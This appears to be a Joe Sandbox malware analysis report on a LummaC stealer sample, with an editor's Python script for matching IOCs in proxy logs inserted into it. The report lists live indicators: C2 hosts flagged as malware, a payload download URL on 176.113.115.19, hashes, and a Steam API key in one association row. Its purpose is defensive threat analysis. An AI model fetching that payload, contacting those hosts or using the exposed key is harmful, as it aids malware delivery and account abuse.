http://176.113.115.19/ScreenUpdateSync.exe( | L7GNkeVm5e.exe, 00000000.00000003.4407193910.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000002.4539968169.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, L7GNkeVm5e.exe, 00000000.00000003.4407439602.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://apporholis.shop:443/apiiP | EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://recaptcha.net | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.5.dr | false | | high
https://store.steampowered.com/ | EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://127.0.0.1:27060 | EB86.tmp.exe, 00000002.00000002.2358948638.0000000000693000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.m | EB86.tmp.exe, 00000002.00000003.2167698252.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://help.steampowered.com/ | EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://api.steampowered.com/ | EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/points/shop | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://store.steampowered.com/account/cookiepreferences/ | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167576807.00000000006DB000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.0000000000656000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/mobile | EB86.tmp.exe, 00000002.00000003.2167576807.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2168224440.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://skidjazzyric.click:443/api | EB86.tmp.exe, 00000002.00000002.2358896798.000000000065A000.00000004.00000020.00020000.00000000.sdmp, EB86.tmp.exe, 00000002.00000003.2167698252.000000000065A000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/ | EB86.tmp.exe, 00000002.00000002.2359015816.00000000006CC000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.179.207 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
176.113.115.19 | unknown | Russian Federation | 49505 | SELECTELRU | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1589517
Start date and time: 2025-01-12 17:51:01 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: L7GNkeVm5e.exe (renamed because the original name is a hash value)
Original Sample Name: f7db525dd98ee5fbdc9c11d59b93985b.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@4/7@11/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 41
• Number of non-executed functions: 341
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.31.73, 13.107.246.45, 20.109.210.53
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:52:00 | API Interceptor | 9115115x Sleep call for process: L7GNkeVm5e.exe modified
11:52:04 | API Interceptor | 3x Sleep call for process: EB86.tmp.exe modified
11:52:25 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.179.207 | NDWffRLk7z.exe | malicious | LummaC |
172.67.179.207 | lBb4XI4eGD.exe | malicious | LummaC |
172.67.179.207 | fuk7RfLrD3.exe | malicious | LummaC |
172.67.179.207 | TUp6f2knn2.exe | malicious | LummaC |
172.67.179.207 | sqJIHyPqhr.exe | malicious | LummaC |
172.67.179.207 | InstallSetup.exe | malicious | LummaC |
172.67.179.207 | wN8pQhRNnu.exe | malicious | LummaC |
172.67.179.207 | TN78WX7nJU.exe | malicious | LummaC |
172.67.179.207 | SEejSLAS9f.exe | malicious | Stealc |
172.67.179.207 | EbXj93v3bO.exe | malicious | Stealc |
104.102.49.254 | r4xiHKy8aM.exe | malicious | Socks5Systemz | /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254 | http://gtm-cn-j4g3qqvf603.steamproxy1.com/ | malicious | Unknown | www.valvesoftware.com/legal.htm
176.113.115.19 | NDWffRLk7z.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | g3toRYa6JE.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | lBb4XI4eGD.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | b0cQukXPAl.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | Mmm7GmDcR4.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | xCnwCctDWC.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
176.113.115.19 | DLKs2Qeljg.exe | malicious | LummaC | 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    fuk7RfLrD3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    Ljrprfl3BH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
                                                                                                                                                                                                                                    chu4rWexSX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 176.113.115.19/ScreenUpdateSync.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
post-to-me.com | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
post-to-me.com | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
post-to-me.com | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
post-to-me.com | b0cQukXPAl.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
post-to-me.com | Mmm7GmDcR4.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
post-to-me.com | xCnwCctDWC.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
post-to-me.com | DLKs2Qeljg.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
post-to-me.com | fuk7RfLrD3.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
post-to-me.com | Ljrprfl3BH.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
post-to-me.com | chu4rWexSX.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
steamcommunity.com | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | UWYXurYZ2x.exe | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | 104.102.49.254
steamcommunity.com | TBI87y49f9.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | H5JVfa61AV.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | 2EG0jAmtY6.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | rii2.mp3.hta | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | 176.113.115.170.ps1 | Get hash | malicious | LummaC | Browse | 104.102.49.254
steamcommunity.com | x.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
CLOUDFLARENETUS | 3bSDIpSIdF.msi | Get hash | malicious | Unknown | Browse | 172.64.41.3
CLOUDFLARENETUS | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
CLOUDFLARENETUS | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 104.21.56.70
CLOUDFLARENETUS | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
CLOUDFLARENETUS | tasAgNgjbJ.exe | Get hash | malicious | Unknown | Browse | 172.67.185.28
CLOUDFLARENETUS | UWYXurYZ2x.exe | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | 104.21.14.233
CLOUDFLARENETUS | rii2.mp3.hta | Get hash | malicious | LummaC | Browse | 104.26.11.53
CLOUDFLARENETUS | mNPTwHOuvT.exe | Get hash | malicious | Vidar | Browse | 172.64.41.3
CLOUDFLARENETUS | setup.msi | Get hash | malicious | Unknown | Browse | 172.67.162.17
CLOUDFLARENETUS | gem1.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.26.13.205
SELECTELRU | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | 176.113.115.170.ps1 | Get hash | malicious | XWorm | Browse | 176.113.115.170
SELECTELRU | b0cQukXPAl.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | Mmm7GmDcR4.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | 1In8uYbvZJ.ps1 | Get hash | malicious | Unknown | Browse | 176.113.115.177
SELECTELRU | xCnwCctDWC.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | DLKs2Qeljg.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
SELECTELRU | fuk7RfLrD3.exe | Get hash | malicious | LummaC | Browse | 176.113.115.19
AKAMAI-ASUS | 3bSDIpSIdF.msi | Get hash | malicious | Unknown | Browse | 23.57.90.146
AKAMAI-ASUS | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | UWYXurYZ2x.exe | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | 104.102.49.254
AKAMAI-ASUS | TBI87y49f9.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | H5JVfa61AV.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | 2EG0jAmtY6.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | rii2.mp3.hta | Get hash | malicious | LummaC | Browse | 104.102.49.254
AKAMAI-ASUS | mNPTwHOuvT.exe | Get hash | malicious | Vidar | Browse | 23.49.251.20
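Read together, the IP, domain and ASN rows above separate dedicated from shared infrastructure: 176.113.115.19 (SELECTELRU) serves /ScreenUpdateSync.exe to ten LummaC samples and is specific to this activity, whereas post-to-me.com sits behind Cloudflare edges (172.67.179.207, 104.21.56.70) and steamcommunity.com resolves to an Akamai edge (104.102.49.254) that legitimate Steam traffic also uses, so an IP block on the latter two would hit far more than the stealer. The script below is an added example (the editor's code, not part of the Joe Sandbox report) that turns those rows into a tiered watchlist and runs it over constructed proxy-log lines. The log format, the tier assignments, and the treatment of the 32-character hex match a0e9f5d64349fb13191bc781f81f42e1 listed further down as a JA3 hash are assumptions of the example, not fields of the report.

```python
"""Tiered IOC watchlist from the association rows above; editor's example, not report code."""
from __future__ import annotations
import re
from dataclasses import dataclass
from ipaddress import ip_address
from urllib.parse import urlsplit

# Indicators transcribed from the tables above. The tier is the editor's reading
# of the ASN rows on the same page, not a field of the report:
#   high = dedicated hosting, safe to block;  low = shared CDN or legitimate
#   infrastructure, alert and pivot only.
INDICATORS = {
    "ip": {
        "176.113.115.19": "high",  # SELECTELRU host serving /ScreenUpdateSync.exe
        "172.67.179.207": "low",   # CLOUDFLARENETUS edge in front of post-to-me.com
        "104.21.56.70": "low",     # CLOUDFLARENETUS edge in front of post-to-me.com
        "104.102.49.254": "low",   # AKAMAI-ASUS edge serving steamcommunity.com
    },
    "domain": {"post-to-me.com": "high", "steamcommunity.com": "low"},
    "url_path": {"/ScreenUpdateSync.exe": "high"},
    # Assumption: the 32-hex match a0e9... is a JA3 hash; the page also lists it
    # against an "Unknown" sample, so it never carries more than low weight.
    "ja3": {"a0e9f5d64349fb13191bc781f81f42e1": "low"},
}
# Assumed log format: "ts src dst method url status [key=value ...]"
LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+(?P<status>\d{3})(?P<extra>(?:\s+\w+=\S+)*)\s*$"
)

@dataclass(frozen=True)
class Hit:
    kind: str
    indicator: str
    tier: str

def _is_ip(value: str) -> bool:
    try:
        ip_address(value)
        return True
    except ValueError:
        return False

def _domain_hits(host: str) -> set[Hit]:
    """Match the host or any parent domain, so cdn.post-to-me.com also hits."""
    labels = host.lower().split(".")
    for i in range(len(labels) - 1):  # never test the bare TLD
        candidate = ".".join(labels[i:])
        if candidate in INDICATORS["domain"]:
            return {Hit("domain", candidate, INDICATORS["domain"][candidate])}
    return set()

def match_line(line: str) -> set[Hit]:
    """Return every watchlist indicator present in one proxy-log line."""
    m = LINE.match(line)
    if not m:
        raise ValueError(f"unparseable log line: {line!r}")
    hits: set[Hit] = set()
    url = urlsplit(m["url"])
    host = (url.hostname or "").lower()
    # Destination IP and an IP-literal host are both checked; the set union
    # prevents a duplicate hit when they are the same address.
    for ip in {m["dst"]} | ({host} if _is_ip(host) else set()):
        if ip in INDICATORS["ip"]:
            hits.add(Hit("ip", ip, INDICATORS["ip"][ip]))
    if host and not _is_ip(host):
        hits |= _domain_hits(host)
    if url.path in INDICATORS["url_path"]:
        hits.add(Hit("url_path", url.path, INDICATORS["url_path"][url.path]))
    extras = dict(kv.split("=", 1) for kv in m["extra"].split())
    ja3 = extras.get("ja3", "").lower()
    if ja3 in INDICATORS["ja3"]:
        hits.add(Hit("ja3", ja3, INDICATORS["ja3"][ja3]))
    return hits

def triage(hits: set[Hit]) -> str:
    """Block only on dedicated infrastructure; a hit on shared infrastructure is
    worth an investigation, not a block that also breaks legitimate traffic."""
    if any(h.tier == "high" for h in hits):
        return "block"
    return "investigate" if hits else "clear"

def scan(lines: list[str]) -> list[tuple[str, set[Hit]]]:
    return [(triage(h), h) for h in map(match_line, lines)]

# Constructed sample log lines, not taken from the report.
SAMPLE_LOG = [
    "2025-01-13T10:02:11Z 10.0.0.5 176.113.115.19 GET http://176.113.115.19/ScreenUpdateSync.exe 200",
    "2025-01-13T10:02:13Z 10.0.0.5 104.21.56.70 POST https://post-to-me.com/ 200 ja3=a0e9f5d64349fb13191bc781f81f42e1",
    "2025-01-13T10:02:14Z 10.0.0.7 104.102.49.254 GET https://steamcommunity.com/ 200",
    "2025-01-13T10:03:00Z 10.0.0.9 172.67.185.28 GET https://example.org/ 200",
]

if __name__ == "__main__":
    for line, (verdict, hits) in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print(f"{verdict:<12}", line.split()[2], sorted((h.kind, h.indicator) for h in hits))
```

Run as-is it prints one verdict per constructed line; in practice SAMPLE_LOG is replaced by lines read from the proxy. The tiers are the point: the association table mixes attacker-controlled hosts with CDN edges and a legitimate site that the stealer merely uses, and only the former belong on a block list, while the latter are pivots for hunting and for the Suricata or DNS telemetry that confirms a hit.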
                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
a0e9f5d64349fb13191bc781f81f42e1 | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
 | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
 | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
 | UWYXurYZ2x.exe | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | 104.102.49.254
 | sE5IdDeTp2.exe | Get hash | malicious | Unknown | Browse | 104.102.49.254
 | TBI87y49f9.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
 | H5JVfa61AV.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
 | 2EG0jAmtY6.exe | Get hash | malicious | LummaC | Browse | 104.102.49.254
 | 5vrRrFN56j.exe | Get hash | malicious | Bdaejec | Browse | 104.102.49.254
 | rii2.mp3.hta | Get hash | malicious | LummaC | Browse | 104.102.49.254
37f463bf4616ecd445d4a1937da06e19 | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
 | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
 | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse | 172.67.179.207
 | UWYXurYZ2x.exe | Get hash | malicious | LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer | Browse | 172.67.179.207
 | setup.msi | Get hash | malicious | Unknown | Browse | 172.67.179.207
 | gem1.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.179.207
 | Setup.msi | Get hash | malicious | Unknown | Browse | 172.67.179.207
 | gem2.exe | Get hash | malicious | Unknown | Browse | 172.67.179.207
 | gem1.exe | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 172.67.179.207
 | 1387457-38765948.15.exe | Get hash | malicious | Nitol | Browse | 172.67.179.207
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Local\Temp\EB86.tmp.exe | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse |
 | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse |
 | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe | NDWffRLk7z.exe | Get hash | malicious | LummaC | Browse |
 | g3toRYa6JE.exe | Get hash | malicious | LummaC | Browse |
 | lBb4XI4eGD.exe | Get hash | malicious | LummaC | Browse |

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 0.9672853563144779
Encrypted: false
SSDEEP: 96:IBQqhQasrhBVod7Rr6tQXIDcQqc6mcEKcw34eE+HbHg/wWGTf3hOyc45WAU6NCUo:UphQag00kigMijsFRzuiFCZ24IO8c
MD5: 22014D14F2C79FD99EEC56E1572ACAAF
SHA1: 4EDB1A2771E73B061FFF46D3BB7FB7157B82DB51
SHA-256: 5152E8D793102C0263F2F7663818BC05BB514C91438D96ACF957A6B1C96D02B5
SHA-512: 5DC0215E46AD13374F89F7499CCEBBCF83A5AB0841D76C342F337EDB386F6EC3BE0184B484D00750578405FC476CFDC56B8393EA792ED9FDAD74ACCC0F4DB1A7
Malicious: true
Reputation: low
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.1.7.4.3.2.6.5.4.8.1.5.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.1.7.4.3.2.7.2.8.2.5.3.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.e.2.e.e.1.f.-.8.5.7.1.-.4.f.d.b.-.a.1.7.e.-.f.3.8.4.4.d.b.d.d.3.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.5.9.6.3.1.e.-.8.2.b.0.-.4.b.8.3.-.a.4.4.9.-.0.f.a.c.e.f.e.6.2.5.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.B.8.6...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.c.-.0.0.0.1.-.0.0.1.4.-.e.d.9.2.-.f.f.4.d.1.2.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.4.3.5.6.5.7.1.a.f.3.7.3.b.a.0.1.4.5.6.d.4.8.4.4.b.f.e.5.5.3.c.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.8.f.a.1.7.d.0.5.2.5.1.b.5.1.5.c.c.5.2.6.9.4.3.3.5.a.8.8.c.7.a.6.0.9.e.3.0.3.!.E.B.8.6...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sun Jan 12 16:52:06 2025, 0x1205a4 type
Category: dropped
Size (bytes): 44496
Entropy (8bit): 2.4985523581789506
Encrypted: false
SSDEEP: 192:6WxXk8LYOp1B1qYbUY+9aVYTmdy0zcF6bjEL9fhmGB9:XLf7B1qYa9a+6niijw9B
MD5: AFCCD061EC28AC047E2FBDD717A44C9D
SHA1: 239874A035F6D6616EA06CDAC0D2E11916636E61
SHA-256: 0EF489345E782C544D84B730E2BA76DF2C5A937CCE0CF19ECB2D78FA40260431
SHA-512: 06EA1CD0A332FC7CF58BD6B878BCF3C32729E8C082B12D742AD0786ED8A6F1F66DB40236BBD738BA0DBA88B7B6976FF1DADF385F271154551B801F79F7F46D3F
Malicious: false
Reputation: low
Preview: MDMP..a..... .......6.g............4...............H.......T...<.......d...,,..........`.......8...........T............?...n......................|...............................................................................eJ....... ......GenuineIntel............T...........2.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8386
Entropy (8bit): 3.6923354080923674
Encrypted: false
SSDEEP: 192:R6l7wVeJ4j6of6Yfq654EpgmfN94bupDH89b7Vsfhpm:R6lXJ86of6YC6fpgmfN9o7ufe
MD5: CBAA97C7FCFE73739DCE683650E2DA17
SHA1: 0150D788F366085EBA32DFB7D535E08C1A5C91D1
SHA-256: 44A506DABC33DC21D2406306EBF07D049B8AC3140A15F8FDD55CFC6C02151E1A
SHA-512: 7499A81A0D960546D3FD9611CB490256C8ACD83C6F37D46900AB002696C0E607578C8EEB6D1CB8F5AA10C1A2320F76845B818A06A2214D3FACEE2E6EFC60A6AF
Malicious: false
Reputation: low
Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.<./.P.i.d.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4714
Entropy (8bit): 4.4712478039753085
Encrypted: false
